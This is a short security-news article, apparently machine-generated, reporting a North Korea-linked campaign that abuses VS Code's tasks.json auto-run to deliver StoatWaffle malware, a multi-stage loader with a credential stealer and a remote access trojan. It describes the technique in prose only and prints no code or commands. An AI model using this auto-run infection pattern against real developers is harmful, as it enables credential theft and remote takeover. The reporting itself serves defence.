Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

North Korea's Insidious Use of VS Code Auto-Run: Unpacking the StoatWaffle Malware Campaign



North Korea-linked threat actors have been using Microsoft Visual Studio Code (VS Code) to spread malware via the auto-run feature. The StoatWaffle malware campaign has been characterized by a multi-stage infection chain, allowing attackers to steal sensitive data and gain remote control over compromised devices. As this malicious actor continues to evolve their tactics, it is essential for users and organizations to remain aware of the risks and take proactive measures to protect themselves.

  • North Korea-linked threat actors are using Microsoft Visual Studio Code (VS Code) to spread malware via its auto-run feature.
  • The malicious actor, Team 8, uses a malware campaign called StoatWaffle that has been designed to leverage the auto-run feature in VS Code.
  • The StoatWaffle malware campaign includes a multi-stage infection chain and can steal sensitive data from infected systems, including credentials and Keychain data.
  • The malware also includes a remote access trojan (RAT) module that enables attackers to run commands on infected systems.



    • North Korea-linked threat actors have been making headlines in recent weeks for their audacious campaign to spread malware via Microsoft Visual Studio Code (VS Code). The malicious actor, identified as Team 8, has successfully abused the auto-run feature in VS Code to execute code whenever a folder is opened. This stealthy tactic allows the attackers to download payloads from the web across operating systems, making it a formidable tool for spreading malware.

    The StoatWaffle malware campaign is believed to have originated in late 2025, with Team 8 initially using OtterCookie as its malware of choice. However, as part of their evolving tactics, they began using a new malware called StoatWaffle in December 2025. This malware has been designed to leverage the auto-run feature in VS Code, allowing it to execute code whenever a folder is opened.

    The malicious project related to blockchain serves as a decoy for the attackers. The repository contains a .vscode directory that includes a tasks.json file. If a user opens and trusts this malicious repository with VSCode, it reads the tasks.json file. This allows the attackers to download payloads from Vercel and run them via cmd.exe. The task then installs Node.js if missing and fetches additional files, enabling further malware execution across operating systems.

    The StoatWaffle malware campaign has been characterized by a multi-stage infection chain. The first stage involves a Node.js loader that repeatedly connects to a command-and-control (C2) server and executes any code it receives. A second downloader is then deployed, continuing this communication and quickly delivering additional malware modules.

    One of the most concerning aspects of the StoatWaffle malware campaign is its ability to steal sensitive data from infected systems. The Stealer module collects credentials from browsers, extension data, installed software details, and even macOS Keychain data, which are then sent back to the attacker's C2 server. This allows the attackers to gain unauthorized access to a wide range of sensitive information.

    The malware also includes a remote access trojan (RAT) module that enables attackers to run commands on infected systems and receive results. This further enhances the malicious actor's control over compromised devices, allowing them to execute arbitrary commands and retrieve data from the system.

    In conclusion, the North Korea-linked threat actors' use of VS Code auto-run to spread StoatWaffle malware is a concerning development that highlights the ever-evolving nature of cyber threats. As attackers continue to adapt and improve their tactics, it is essential for users and organizations to remain vigilant and take proactive measures to protect themselves from these malicious campaigns.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/North-Koreas-Insidious-Use-of-VS-Code-Auto-Run-Unpacking-the-StoatWaffle-Malware-Campaign-ehn.shtml

  • https://securityaffairs.com/189880/security/north-korea-linked-threat-actors-abuse-vs-code-auto-run-to-spread-stoatwaffle-malware.html

  • https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

  • https://cybersecuritynews.com/hackers-extensively-abuses-visual-studio-code/

  • https://any.run/cybersecurity-blog/ottercookie-malware-analysis/

  • https://www.microsoft.com/en-us/security/blog/2026/03/11/contagious-interview-malware-delivered-through-fake-developer-job-interviews/

  • https://www.malwarebytes.com/blog/threats/info-stealers

  • https://www.cyber.gov.au/threats/types-threats/malware/information-stealer-malware

  • https://www.malwarebytes.com/blog/threats/remote-access-trojan-rat

  • https://www.kaspersky.com/resource-center/definitions/what-is-a-rat-remote-access-trojan

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://malpedia.caad.fkie.fraunhofer.de/actor/apt41

  • https://anyrun.substack.com/p/ottercookie-analysis-of-lazarus-group


    • Published: Tue Mar 24 03:32:05 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us